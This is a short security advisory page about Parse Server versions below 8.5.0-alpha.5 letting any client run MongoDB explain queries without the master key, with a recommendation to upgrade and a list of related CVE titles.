Parse Server allows public `explain` queries which may expose sensitive database performance information and schema deta
- Severity:
- Medium
Description
The MongoDB explain() method provides detailed information about query execution plans, including index usage, collection scanning behavior, and performance metrics. Parse Server permits any client to execute explain queries without requiring the master key.
Recommendation
Update the parse-server package to the latest compatible version. Followings are version details:
- Affected version(s): < 8.5.0-alpha.5
- Patched version(s): 8.5.0-alpha.5
References
Related Issues
- Vega Cross-Site Scripting (XSS) via expressions abusing toString calls in environments using the VEGA_DEBUG global varia - CVE-2025-59840
- webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browse - CVE-2025-30360
- Parse Server before v3.4.1 vulnerable to Denial of Service - CVE-2019-1020012
- Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability (GHSA-m5vv-6r4h-3vj9) - CVE-2024-35255
- Tags:
- npm
- parse-server
Anything's wrong? Let us know Last updated on November 13, 2025